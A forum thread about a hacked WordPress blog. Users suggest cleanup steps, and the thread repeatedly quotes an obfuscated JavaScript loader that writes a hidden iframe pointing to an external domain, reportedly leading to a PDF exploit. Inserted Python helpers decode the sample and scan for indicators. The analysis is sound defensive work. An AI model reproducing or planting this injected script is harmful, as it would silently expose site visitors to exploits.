Need Help Killing This

30 replies
Well, it finally happened. My blog has been hacked.

I received this message when I tried to open my blog just now

The requested URL could not be retrieved

While trying to retrieve the URL:



The following error was encountered:

The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Iframer

This was reported by Kaspersky. Anybody know how to remove it?

Thanks.
#rid #trojan
  • Gene Pimentel wrote:
    Sorry this has happened to you Steven! Don't know if this will help, but check:

    Kaspersky Lab Forum > HEUR: TROJAN.Script.Iframer
  • R Hagel wrote:
    I think you should edit your link out of this post and your profile, just so no one clicks there until you get the virus situation straightened out.
    • Steven Wagenheim wrote:
      Originally Posted by R Hagel View Post

      I think you should edit your link out of this post and your profile, just so no one clicks there until you get the virus situation straightened out.
      Thanks...didn't think of that.

      If anybody has a clue how to fix this I'd be extremely grateful.
      • zeurois wrote:
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.

        If anybody has a clue how to fix this I'd be extremely grateful.
        First check if any of the source files were altered. If so, revert to originals (doing that no matter what won't harm your blog in any way ... if it's not REALLY OLD)

        Secondly, do a scan on your PC.

        Lastly .. if the problem isn't fixed, ask the hosting company to do the same, maybe the server is "delivering" the virus.

        HTH
      • Ron Douglas wrote:
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.

        If anybody has a clue how to fix this I'd be extremely grateful.
        That happened to me before when I neglected to upgrade to the latest WordPress version.
        Now I use the automatic upgrade plugin and it makes it much easier to stay updated.

        To resolve the hack, I had to go through all of the blog files and remove the IFrames and funny links which didn't belong.

        You can compare your current files with the default WordPress files to see what has been added.
        • Steven Wagenheim wrote:
          Originally Posted by Ron Douglas View Post


          You can compare your current files with the default WordPress files to see what has been added.
          I have absolutely no idea how to do this.
          • Ron Douglas wrote:
            Originally Posted by Steven Wagenheim View Post

            I have absolutely no idea how to do this.
            If you want I can have a look at it for you. Send me a PM.
            • Steven Wagenheim wrote:
              I just got this reply from the Kaspersky forum. It's not a false positive.

              hello
              it's not a false positive, there's an obfuscated script on that page (i broke a few lines on the script):
              CODE
              fun cti on Decode(){var temp="",i,c=0,out=""; var str="60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();

              that script leads to a PDF exploit. to clear it up you need to search through the code and remove the script

              I have no idea where to even begin looking for this.

              Any clues?
              • zeurois wrote:
                CuteFTP (if you have it) checks and skips the files that have exactly the same size as the ones on the server. You'll be asked to overwrite only a few of them (the altered ones).

                Originally Posted by Steven Wagenheim View Post

                I just got this reply from the Kaspersky forum. It's not a false positive.

                hello
                it's not a false positive, there's an obfuscated script on that page (i broke a few lines on the script):
                CODE
                fun cti on Decode(){var temp="",i,c=0,out=""; var str="60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();

                that script leads to a PDF exploit. to clear it up you need to search through the code and remove the script

                I have no idea where to even begin looking for this.

                Any clues?
      • R Hagel wrote:
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.
        No problem. You should also temporarily strip it out of your sig file.

        Hope you get it fixed without losing too much hair.

        Cheers,
        Becky
        • Steven Wagenheim wrote:
          Originally Posted by R Hagel View Post

          No problem. You should also temporarily strip it out of your sig file.

          Hope you get it fixed without losing too much hair.

          Cheers,
          Becky
          Becky, I've stripped the URL out of my sig and I have support requests
          just about everywhere for this mess including Kaspersky, WordPress and
          even the guy who takes care of my hosting (he's a warrior) but so far,
          nobody's been able to give me an answer as to how to fix this mess.

          Losing hair? Pffft...not important enough to lose hair over. Worst-case
          scenario is I kill the whole blog folder and do a reinstall. My only problem
          will then be how to point the new blog to my existing database. That's
          the only thing I don't know how to do.
          • NMP wrote:
            Originally Posted by Steven Wagenheim View Post

            Becky, I've stripped the URL out of my sig and I have support requests
            just about everywhere for this mess including Kaspersky, WordPress and
            even the guy who takes care of my hosting (he's a warrior) but so far,
            nobody's been able to give me an answer as to how to fix this mess.

            Losing hair? Pffft...not important enough to lose hair over. Worst-case
            scenario is I kill the whole blog folder and do a reinstall. My only problem
            will then be how to point the new blog to my existing database. That's
            the only thing I don't know how to do.
            Hi Steve

            Do a new install. Then FTP or go to CPanel filemanager and open
            wp-config.php. Replace the autoinstaller database details with your old
            ones and save wp-config.php and/or upload it again.

            Daniel


            <?php
            // ** MySQL settings ** //
            define('DB_NAME', '--------------'); // The name of the database
            define('DB_USER', '--------------'); // Your MySQL username
            define('DB_PASSWORD', '-------'); // ...and password
            define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
            define('DB_CHARSET', 'utf8');
            define('DB_COLLATE', '');
      • Floyd Fisher wrote:
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.

        If anybody has a clue how to fix this I'd be extremely grateful.
        It's an iframe, right?

        First off, get ahold of a product called 'Crimson Editor'; you'll thank me for this freebie later.

        Now, download your entire public_html or www folder into a special quarantine folder. Then open up Crimson Editor, and have it search that folder for any files containing the word iframe. Then sort through the list it finds for something like this:

        <iframe src="http://example.com" height="200">
        Alternative text for browsers that do not understand IFrames.
        </iframe>

        As you find 'em nuke 'em by highlighting and deleting the hacked lines of code.

        After you're done, make sure you save the newly disinfected files, and re-upload your WordPress blog back to your website, and make sure you overwrite everything!

        If you don't want to do this, I work for cheap and love to nuke stuff like this. PM me with your ftp access and I'll get to work.
  • RobinInTexas wrote:
    seems like the site is ok from here
  • Ron Douglas wrote:
    Some hosting control panels allow you to do a search through all your files. You may be able to grab a piece of the code and do a text search to find the files containing that code.
    • Alan Petersen wrote:
      Make sure you click to view hidden files via your FTP client. When this happened to me they slipped a hidden file which deactivated all my plugins so they could spam comment.
    • Anup Mahajan wrote:
      Hello Steven,

      Sorry this happened to you.

      Ron, I was going to say the same thing. The first piece of the jigsaw is to find the corrupt file and then to fix it.

      I suppose you do take daily backups so that you can revert to older files once you have identified the corrupt file(s).

      Regards,
      Anup
    • Steven Wagenheim wrote:
      Originally Posted by zeurois View Post

      Did you even try what I said?
      Yes, I have no idea how to tell what's been altered. And the problem is NOT
      on my PC. My blog was hacked.

      On another note and slightly off topic but I feel relevant, people bitch and
      complain about how IM ebooks are all rehashed garbage.

      Well, how about somebody write a book on how to unhack a WP blog and
      fix this mess?

      I'd buy it right now if it existed.
  • Lloyd Lopes wrote:
    Steven

    WordPress is a bunch of PHP files + .htaccess which is hooked up to a database.
    You can replace all of the WordPress files with new files, which will overwrite the file with the funny script and clean up your problem without wiping any of your data out.

    Some steps: (Don't do this if you know some of your code was modified by a coder to make it do some non-standard things - you will know if you did this because you will have asked a coder to do it.)

    1. Open FTP - find the WordPress root (the big file with all the small WordPress files and folders in). I like FireFTP - The Free FTP Client for Mozilla Firefox to do this. Enter username, ftp.yoursite.com and password. Download all files to a backup folder (name it backup) on the desktop.

    2. Download WordPress from WordPress › Blog Tool and Publishing Platform. Unzip into another folder.

    Upgrading from any previous WordPress to 2.7:
    3. Delete your old WP files, EXCEPT wp-config.php AND wp-content/themes/yourtemplateyouused AND wp-content/plugins if you had any custom plugins installed.
    4. Upload the new files.
    5. Point your browser to /wp-admin/upgrade.php. Enter stuff.

    That's it. If all goes wrong delete everything and upload the old files.
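Steps 1 and 2 above leave you with two copies of WordPress: the downloaded site and a fresh unzip. As an added example (not code from the post or from WordPress), this Python script hashes both trees and lists which files were edited, added or removed, so you know what the funny script touched before step 3 deletes anything; SITE_ONLY, the triage rules and the sample trees built in demo() are constructed assumptions.

```python
import hashlib
import tempfile
from pathlib import Path

# Files that legitimately exist only on the live site and never in a fresh download.
# Assumed list; extend it for anything else your host or installer adds.
SITE_ONLY = {"wp-config.php", ".htaccess"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root):
    """Map of relative path -> sha256 for every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare_trees(clean_root, site_root):
    """Which site files differ from, are extra to, or are missing from the clean copy."""
    clean, site = tree_hashes(clean_root), tree_hashes(site_root)
    return {
        "modified": sorted(f for f in site if f in clean and site[f] != clean[f]),
        "added": sorted(f for f in site if f not in clean),
        "missing": sorted(f for f in clean if f not in site),
    }


def triage(report):
    """What to read first: every edited file, plus extra files where none belong."""
    suspicious = list(report["modified"])
    for f in report["added"]:
        if f in SITE_ONLY:
            continue
        in_content = f.startswith("wp-content/")
        # Themes, plugins and uploads differ per site; PHP inside uploads should not exist.
        if not in_content or (f.startswith("wp-content/uploads/") and f.endswith(".php")):
            suspicious.append(f)
    return sorted(set(suspicious))


def write(root, rel, data):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_bytes(data)


def demo():
    """Constructed sample trees standing in for the fresh unzip and the site backup."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = Path(tmp) / "wordpress", Path(tmp) / "backup"
        for root in (clean, site):
            write(root, "wp-login.php", b"<?php // constructed stand-in for a core file\n")
            write(root, "wp-content/themes/default/footer.php", b"</body></html>\n")
        # Site-side differences: a legitimate config, an edited theme footer, two extra files.
        write(site, "wp-config.php", b"<?php // constructed local config\n")
        write(site, "wp-content/themes/default/footer.php",
              b"</body>\n<!-- constructed: a line that is not in the clean copy -->\n</html>\n")
        write(site, "wp-content/uploads/x.php", b"<?php // constructed: PHP where only media belongs\n")
        write(site, "core.18300", b"\x00 constructed stand-in for the core dump named in the thread")
        report = compare_trees(clean, site)
        return report, triage(report)


if __name__ == "__main__":
    report, flagged = demo()
    print(report)
    print("look at first:", flagged)
```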
    • Steven Wagenheim wrote:
      Okay, I think I found the problem.

      Somebody put a file core.18300 on my server. I can't delete it. It's giving
      me a permission error. I've tried going in to control panel and changing
      the permissions and I still can't delete it.

      What do I do? Do I need to get my web host to delete this file?
      • Floyd Fisher wrote:
        Originally Posted by Steven Wagenheim View Post

        Okay, I think I found the problem.

        Somebody put a file core.18300 on my server. I can't delete it. It's giving
        me a permission error. I've tried going in to control panel and changing
        the permissions and I still can't delete it.

        What do I do? Do I need to get my web host to delete this file?
        More than likely, it's because your host locked it down for you.

        But I would call them highest priority and have them nuke that file immediately.
      • Bishop81 wrote:
        Originally Posted by Steven Wagenheim View Post

        Okay, I think I found the problem.

        Somebody put a file core.18300 on my server. I can't delete it. It's giving
        me a permission error. I've tried going in to control panel and changing
        the permissions and I still can't delete it.

        What do I do? Do I need to get my web host to delete this file?
        If you're still having this problem, try changing the file name first, and then deleting it.

        You can also try deleting it from the cpanel file manager.
  • Britt Malka wrote:
    Well, I cannot grasp the problem. Is your blog on a Windows server, or how on earth could it get infected with a trojan or virus?

    You have a webmaster, you say. This should be very easy to fix. Or else PM me.
  • Gene Pimentel wrote:
    Yeah, you'll likely have to have your webhost delete that for you. It won't let you delete it because you are not the 'owner' of that file.
  • JayXtreme wrote:
    It's a VERY common hack Steve..

    Check your footer.php file for irregularities.. it is usually found in there..there will be a "call", usually from footer.php to the virus located on your server.. cut out the script that calls it into action and your problem is gone

    Peace

    Jay
    • Steven Wagenheim wrote:
      Originally Posted by JayXtreme View Post

      It's a VERY common hack Steve..

      Check your footer.php file for irregularities.. it is usually found in there..

      Peace

      Jay
      Thank you Jay. You know, I usually don't wish people any harm, but hackers
      who do this...well, what I wish for them you can't print in a public forum.

      This is not exactly the way I wanted to spend my day.
      • Steven Wagenheim wrote:
        One other thing, while I'm trying to fix this mess.

        Recently, somebody has been messing with the permissions on my server. I
        think this is part of the problem. Somebody got in somewhere and was able
        to do this.

        So, question is this. I want to set the permissions for my public_html and
        blog folders.

        What should they be? 644 or 755? I don't remember.

        What do people normally set them to?
        • Britt Malka wrote:
          Folders have 755 as default and files 644.

          Sometimes if you cannot delete a file, you can rename it, and later delete it. Or try to change the permissions to 644 and delete it.
  • Ross Dalangin wrote:
    Ask for help from your web host and let them check your theme. Change your passwords, arrange your files in your FTP software based on date and check which files are modified and what other files are added. If you see writeable folders or files, especially (777), then evaluate whether the files or folders are really needed and then change it.
  • Jon Alexander wrote:
    Steve, you need to get onto support at your host immediately. The virus could be everywhere, so even if you manage to delete it yourself, it could come back...

    PS my PM system is broken. Sorry I can't help anymore.
  • LB wrote:
    This most likely happens when you run an out-of-date version of WordPress...the problem with being the premiere blogging platform is that exploits spread fast and wide and it's easy to find blogs that aren't updated.

    Sounds like your host may need to get in there and remove the offending files.
  • zeurois wrote:
    I don't know if this got fixed but:

    I grabbed that code from a post here ...

    fun cti on Decode(){var temp="",i,c=0,out=""; var str="60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();

    Decoded it ... (I thought it was obfuscated, it wasn't)

    fun cti on Decode()
    {
    var temp = "", i, c = 0, out = "";
    var str = "60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";
    l = str.length;
    while (c <= str.length - 1)
    {
    while (str.charAt(c) != '!') {
    temp = temp + str.charAt(c ++);
    }
    c++;
    out = out + String.fromCharCode(temp);
    temp = "";
    }
    documen t.write(out);
    }
    Decode();


    and tested it on w3schools ...

    It created an iframe which went nowhere (404)

    Not Found

    The requested URL /docs/info.html� style= was not found on this server.
    Apache/2.2.3 (CentOS) Server at filarmon.info Port 80
    but ... the URL it pointed to is

    http://filarmon.info/docs/info.html%EF%BF%BD%20style=


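The decode zeurois walked through above, redone as an added Python analysis helper (not code from the thread or from Kaspersky) so the string can be inspected without running the script. It also explains the odd URL he saw: the '3 4' that the line break introduced makes String.fromCharCode produce U+0000 in place of the closing quote of src, which the HTML parser replaces with U+FFFD, the %EF%BF%BD in the URL he observed. ENCODED is the string as pasted in the thread; the indicator patterns in scan_text are my own assumptions about what to grep for in a site backup.

```python
import re

# The encoded string exactly as it was pasted in the thread, including the stray
# spaces the Kaspersky responder introduced when breaking the lines.
ENCODED = (
    "60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 "
    "!108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 "
    "4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! "
    "116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! "
    "32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 "
    "!100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!"
)


def decode_bang_codes(encoded, emulate_js=True):
    """Rebuild the text from '!'-separated character codes without running any JavaScript.

    With emulate_js=True the result mirrors String.fromCharCode(temp) in the script:
    Number() trims leading/trailing whitespace, but a token with an inner space
    such as '3 4' converts to NaN, and fromCharCode(NaN) yields U+0000.
    """
    tokens = encoded.split("!")
    if tokens and tokens[-1] == "":
        tokens.pop()  # the script's loop stops at the final '!' and never reads past it
    out = []
    for tok in tokens:
        t = tok.strip()
        if t.isdigit():
            out.append(chr(int(t)))
        elif emulate_js:
            out.append("\x00")
        else:
            raise ValueError(f"non-numeric token {tok!r}")
    return "".join(out)


def decode_cleaned(encoded):
    """Decode after removing the inserted whitespace: what the untouched script wrote."""
    return decode_bang_codes(re.sub(r"\s+", "", encoded), emulate_js=False)


IFRAME_SRC = re.compile(r'<iframe\s[^>]*?src="([^"]*)"', re.I)


def iframe_src(markup):
    """Return the src of the first iframe in the markup, or None."""
    m = IFRAME_SRC.search(markup)
    return m.group(1) if m else None


def is_hidden_iframe(markup):
    """True for the hiding tricks used here: visibility:hidden or a 1x1 pixel frame."""
    low = markup.lower()
    return "<iframe" in low and (
        "visibility:hidden" in low or ("width:1px" in low and "height:1px" in low)
    )


# Assumed indicators for grepping a site backup, based on what this sample contains.
INDICATORS = [
    ("char-code string", re.compile(r'"(?:\s*\d+\s*!){8,}')),
    ("fromCharCode decoder", re.compile(r"String\s*\.\s*fromCharCode")),
    ("document.write of decoded text", re.compile(r"document\s*\.\s*write")),
    ("hidden iframe", re.compile(r"<iframe[^>]*visibility\s*:\s*hidden", re.I)),
]


def scan_text(text):
    """Names of the indicators present in a file's text (e.g. a theme's footer.php)."""
    return [name for name, rx in INDICATORS if rx.search(text)]


if __name__ == "__main__":
    print("as pasted :", repr(decode_bang_codes(ENCODED)))
    print("cleaned   :", decode_cleaned(ENCODED))
    print("src seen  :", repr(iframe_src(decode_bang_codes(ENCODED))))
```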
  • jerson wrote:
    Do a backup regularly. I think you should contact your host about this.
  • tiffanymor4you wrote:
    Steve, I think you need to take a trip over to the wicked fire forum. You are quite popular over there and they have a thread devoted to you. Just sign up if you aren't a member and do a search for your last name to find the threads. They've been talking about you for some time and I just noticed that they are now reporting the hack to your web site.
  • NewbiesDiary wrote:
    I haven't read all the replies, so sorry if someone has already suggested this...

    I hadn't updated the forum version on my dirt bike site, and someone hacked it and put all kinds of shit on it - so bad that my site had the warning under it on all the google pages.

    I got onto my host and explained to them and they found all the crap and cleaned it all off for me - and they didn't charge me either - it only took them an hour or so to do it and they were great, but I did do the "Oh my gosh, I'm such a girl" thing LOL - give that a try Steven hehe.

    Good luck
  • Ken Shorey wrote:
    Steve,

    "core.*" files are related to PHP or other code crashing while running a script on your site.

    You said in another thread that you had tried to update WordPress using the automatic updater plugin and it didn't work. Maybe that created the .core file.
  • JonathanBoettcher wrote:
    Hi Steve - looks like there's plenty of people trying to help you solve the problem, but all I can do is tell you what I do to try to prevent these types of things...

    I've installed the Login Lockdown plugin on all my blogs - the idea is to prevent anyone from hacking in. I suppose they could have gotten into your system through a different means as well, but this should help with some of that.

    free download is here: Bad Neighborhood - Login LockDown WordPress Security Plugin